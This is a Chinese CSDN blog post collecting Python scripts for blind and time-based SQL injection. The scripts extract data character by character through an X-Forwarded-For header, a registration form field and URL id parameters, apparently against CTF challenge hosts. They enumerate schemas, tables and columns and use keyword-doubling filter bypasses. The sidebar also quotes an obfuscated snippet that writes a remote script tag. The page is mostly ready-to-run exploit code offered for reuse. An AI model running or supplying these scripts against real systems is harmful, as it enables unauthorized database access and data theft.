sql注入常用脚本

最新推荐文章于 2024-09-28 09:26:38 发布
最新推荐文章于 2024-09-28 09:26:38 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/108932892
版权

SQL注入 时间盲注 二分法 X-Forwarded-For 数据库安全
关键词由CSDN通过智能技术生成

XFF时间盲注二分法

import requests

url="http://49.235.141.207:25501/test_sql/sql_ip_insert/"
flag=''
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        p1="127.0.0.1' and (case when ascii(substr((select flag from flag) from {} for 1))>{} then sleep(3) else 0 end) and '1".format(str(i),str(mid))
        p2="127.0.0.1' and (case when ascii(substr((select flag from flag) from {} for 1))={} then sleep(3) else 0 end) and '1".format(str(i),str(mid))
        headers1={'X-Forwarded-For':p1}
        headers2={'X-Forwarded-For':p2}
        try:
            print(i,mid)
            r1=requests.get(url,headers=headers2,timeout=3)
        except requests.exceptions.ReadTimeout as e:
            flag+=chr(mid)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            try:
                r2=requests.get(url,headers=headers1,timeout=3)
            except requests.exceptions.ReadTimeout as e:
                low=mid+1
            except Exception as e:
                pass
            else:
                top=mid-1

    if flag==f1:
        break

二分法时间盲注

import requests

url="http://e2237b8f-0ea4-4294-bbe7-007af8f88f8b.node3.buuoj.cn/register.php"
flag=''
proxies={
    "http":"127.0.0.1:8080"
}
for i in range(1,50):
    f1=flag
    top=127
    low=33
    # print(1)
    while low<=top:
        mid=(top+low)//2
        p1="aaaaa' || (case when ascii(substr((select*from flag) from {} for 1))>{} then sleep(3) else 0 end) || 'aaa".format(i,mid)
        p2="aaaaa' || (case when ascii(substr((select*from flag) from {} for 1))={} then sleep(3) else 0 end) || 'aaa".format(i,mid)
        data1={'email':'basb@qq.com','username':p1,'password':'1234'}
        data2={'email':'basb@qq.com','username':p2,'password':'1234'}
        try:
            print(i,mid)
            r1=requests.post(url,data=data2,timeout=3,proxies=proxies)
        except requests.exceptions.ReadTimeout as e:
            flag+=chr(mid)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            try:
                r2=requests.post(url,data=data1,timeout=3,proxies=proxies)
            except requests.exceptions.ReadTimeout as e:
                low=mid+1
            except Exception as e:
                pass
            else:
                top=mid-1

    if flag==f1:
        break

二分法盲注

import requests

url="http://116.63.149.36:50048/file_id.php?id="
flag=''
for i in range(1,50):
	f1=flag
	top=127
	low=33
	while low<=top:
		mid=(top+low)//2
		# data={'id':'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(str(i),str(mid))}
		# data1={'id':'if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(str(i),str(mid))}
		data='if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(str(i),str(mid))
		data1='if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(str(i),str(mid))
		try:
			r1=requests.post(url+data1)
			print(i,mid)
			if 'glzjin' in r1.text:
				flag+=chr(mid)
				print(flag)
				break
			r=requests.post(url+data)
			if "Error" in r.text:
				top=mid-1
			if 'glzjin' in r.text:
				low=mid+1
		except Exception as e:
			pass
	if flag==f1:
		break

时间盲注

import requests

url = 'http://139.199.182.61/index.php?id=1%27'
lendata=7
# for i in range(1, 50):
# 	try:
# 		payload1 = '/**/and/**/if(length(database())={},sleep(3),1)%23'.format(i)
# 		r = requests.get(url + payload1, timeout=3)
# 	except requests.exceptions.ReadTimeout as e:
# 		lendata = i
# 		print("数据库长度为"+str(i))
# 		break

databases=['easysql']

# database=""
# for j  in range(1,lendata+1):
# 	for k in range(33,127):
# 		payload2 = '/**/and/**/if(ascii(substr(database(),{},1))={},sleep(3),1)%23'.format(j, k)
# 		print(payload2)
# 		try:
# 			r=requests.get(url+payload2,timeout=3)
# 		except requests.exceptions.ReadTimeout as e:
# 			database+=chr(k)
# 			print(database)
# 			break
# 		except Exception as w:
# 			pass

# database=''
# databases=[]
# for k in range(0, 10):
#	flag1=len(databases)
# 	for i in range(1,50):
# 		flag=database
# 		for j in range(33,127):
# 			payload3='/**/and/**/if(ascii(substr((selselectect/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/{},1),{},1))={},sleep(3),1)%23'.format(k , i, j)
# 			try:
# 				print(payload3)
# 				r=requests.get(url+payload3,timeout=3)
# 			except requests.exceptions.ReadTimeout as e:
# 				database+=chr(j)
# 				print(database)
# 				break
# 			except Exception as w:
# 				pass
# 		if flag==database:
# 			break
# 	databases.append(database)
#	if flag1==len(databases):
#		break
# print(databases)


tables=['f1aggggggggggggg']
# table=''
# # tables=['users']
# for k in range(0, 10):
# 	flag1=len(tables)
# 	for i in range(1,50):
# 		flag=table
# 		for j in range(33,127):
# 			payload3='/**/and/**/if(ascii(substr((selselectect/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/{},1),{},1))={},sleep(3),1)%23'.format(k , i, j)
# 			try:
# 				print(payload3)
# 				r=requests.get(url+payload3,timeout=3)
# 			except requests.exceptions.ReadTimeout as e:
# 				table+=chr(j)
# 				print(table)
# 				break
# 			except Exception as w:
# 				pass
# 		if flag==table:
# 			tables.append(table)
# 			table=""
#			break
# 	if len(tables)=flag1
#	break
# print(tables)

columns=['fl4444444g']
# column=''
# for te in tables:
# 	for k in range(0,5):
#		flag1=len(columns)
# 		for i in range(1,50):
# 			flag=column
# 			for j in range(33,127):
# 				payload4='/**/and/**/if(ascii(substr((seselectlect/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="{}" limit/**/{},1),{},1))={},sleep(3),1)%23'.format(te,k,i,j)
# 				try:
# 					r=requests.get(url+payload4,timeout=3)
# 					print(payload4)
# 				except requests.exceptions.ReadTimeout as e:
# 					column+=chr(j)
# 					print(column)
# 					break
# 				except Exception as w:
# 					pass	
# 			if flag==column:
# 				columns.append(column)
# 				column=''
# 				break
#		if len(columns)=flag1:
#			break;
# print(columns)

# data=''

# for db in databases:
# 	for ta in tables:
# 		for co in columns:
# 			for k in range(0,10):
# 				for i in range(1,50):
# 					flag=data
# 					for j in range(33,127):
# 						payload5='/**/and/**/if(ascii(substring((seselectlect/**/{}/**/from/**/{}.{}/**/limit/**/{},1),{},1))={},sleep(3),1)%23'.format(co,db,ta,k,i,j)
# 						try:
# 							r=requests.get(url+payload5,timeout=3)
# 							print(payload5)
# 						except requests.exceptions.ReadTimeout as e:
# 							data+=chr(j)
# 							print(data)
# 							break
# 						except Exception as w:
# 							pass	
# 					if flag==data:
# 						data=''
# 						brea

其他

import requests
s=requests.session()
url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

import requests
url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url):                    #爆库名
    for i in range(1,5):
        for j in range(32,128):
            u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
            s = url+u
            print(s)
            r =  requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))
                
def table(url):                    #爆表名
    for i in range(4):
        table_name=''
        for j in range(1,6):
            for k in range(48,128):
                u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
                s = url+u
                print(s)
                r =  requests.get(s)            
                if 'By Rudyard Kipling' in r.text:
                    table_name+=chr(k)
            print(table_name)
西部壮仔
关注
专栏目录
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1219
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
fzr_SQL(万能防注入代码)
10-20
fzr_SQL(万能防注入代码).rar 精而巧,调用方法超简单,站长必备呀!!!
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
sql注入脚本1
m0_55772907的博客
05-01 1003
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
SQL手工注入漏洞测试(墨者学院)
最新发布
2301_80194086的博客
09-28 256
【代码】SQL手工注入漏洞测试(墨者学院)
SQL注入总结
10-20 245
 HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);
MySQL SQL 常见注入脚本
阿宝
07-14 3446
VersionSELECT @@versionComments SELECT 1; #comment SELECT /*comment*/1;Current User SELECT user(); SELECT system_user();List UsersSELECT user
SQL注入脚本SQL注入脚本
11-26
SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本
基于ESAPI的防sql注入jar包及使用示例.rar
10-17
它由OWASP(开放网络应用安全项目)维护,旨在解决常见的Web应用安全问题,包括SQL注入、XSS跨站脚本等。ESAPI提供了一套完整的API,帮助开发者编写更安全的代码。 **核心组件:ESAPIUtils** 在提供的文件中,`...
E007-渗透测试常用工具-使用darkmysqli进行sql注入.pdf
12-02
DarkMySQLi是一个Python脚本,可以帮助我们进行SQL注入攻击。它的基本参数包括: - `-u` 指定带有注入点的URL。 - `--findcol` 用于查找字段长度。 - `--full` 列出所有数据。 - `--dump` 转储数据库表项。 - `-D` ...
SQL注入测试脚本大全:实战渗透与检测语句
以下是一些常用SQL注入测试脚本示例: 1. **字符编码测试**: - `жǷע;and1=1;and1=2`:检查是否存在特殊字符编码支持,如中文字符。 - `(1)ֶεasciiֵaccess` 和 `(2)ֶεasciiֵmssql`:利用ASCII编码检测...
SQL 注入脚本学习笔记
二进制的博客
10-11 1384
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql代
【PyHacker编写指南】Sql注入脚本编写
XunanSec的博客
05-15 2342
这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python写脚本的小伙伴可以跟着一起写一写。
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1527
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
sql注入自动化脚本POST和GET型
m0_73728268的博客
03-09 354
post和get型sql注入自动化脚本
sql枚举数据库注入脚本
superprintf的博客
10-02 357
一. 成果展示 假设我的数据库有这些 那么把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理 其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式 select * from users where id='-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //得到数据库名 select * from u
常用SQL注入语句
孤的博客
10-11 2336
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。 每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。 局部变量(Local Variable)和全局变量(Global Varia...
手动方式SQL注入脚本命令之精华版
lvlv526的专栏
03-13 937
手动方式SQL注入脚本命令之精华版1.判断是否有注入;and 1=1 ;and 1=2   2.初步判断是否是mssql ;and user>0  3.注入参数是字符and [查询条件] and =  4.搜索时没过滤参数的and [查询条件] and %25=  5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  
常见SQL注入手法
weixin_57048716的博客
11-26 1708
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值